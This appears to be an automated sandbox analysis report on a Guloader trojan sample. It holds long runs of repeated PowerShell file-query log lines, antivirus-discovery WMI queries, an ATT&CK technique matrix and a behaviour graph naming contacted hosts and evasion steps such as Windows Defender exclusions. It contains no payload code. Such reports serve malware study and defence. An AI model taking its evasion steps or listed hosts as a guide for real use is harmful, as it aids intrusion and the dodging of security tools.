        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: yVVZdG2NJX.exe, 00000003.00000002.2615291891.00000000375EB000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2615291891.00000000375DC000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		11
        Disable or Modify Tools        		OS Credential Dumping2
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API        		2
        Registry Run Keys / Startup Folder        		1
        Access Token Manipulation        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory215
        System Information Discovery        		Remote Desktop Protocol1
        Clipboard Data        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell        		Logon Script (Windows)11
        Process Injection        		2
        Obfuscated Files or Information        		Security Account Manager321
        Security Software Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		NTDS1
        Process Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading        		LSA Secrets31
        Virtualization/Sandbox Evasion        		SSHKeylogging12
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
        Process Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561885 Sample: yVVZdG2NJX.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 35 mertvinc.com.tr 2->35 43 Suricata IDS alerts for network traffic 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 5 other signatures 2->49 9 yVVZdG2NJX.exe 2 26 2->9         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\System.dll, PE32 9->31 dropped 51 Bypasses PowerShell execution policy 9->51 53 Adds a directory exclusion to Windows Defender 9->53 55 Tries to detect virtualization through RDTSC time measurements 9->55 57 Switches to a custom stack to bypass stack traces 9->57 13 yVVZdG2NJX.exe 12 9->13         started        signatures6 process7 dnsIp8 37 87.121.86.8, 4020, 49821, 49878 SKATTV-ASBG Bulgaria 13->37 39 mertvinc.com.tr 185.244.144.68, 49776, 80 BIRBIRTR Turkey 13->39 33 C:\Users\user\AppData\...\yVVZdG2NJX.exe, PE32 13->33 dropped 59 Adds a directory exclusion to Windows Defender 13->59 18 powershell.exe 23 13->18         started        21 powershell.exe 23 13->21         started        23 powershell.exe 21 13->23         started        file9 signatures10 process11 signatures12 41 Loading BitLocker PowerShell Module 18->41 25 conhost.exe 18->25         started        27 conhost.exe 21->27         started        29 conhost.exe 23->29         started        process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        yVVZdG2NJX.exe42%ReversingLabsWin32.Trojan.Guloader
        yVVZdG2NJX.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe100%Joe Sandbox ML
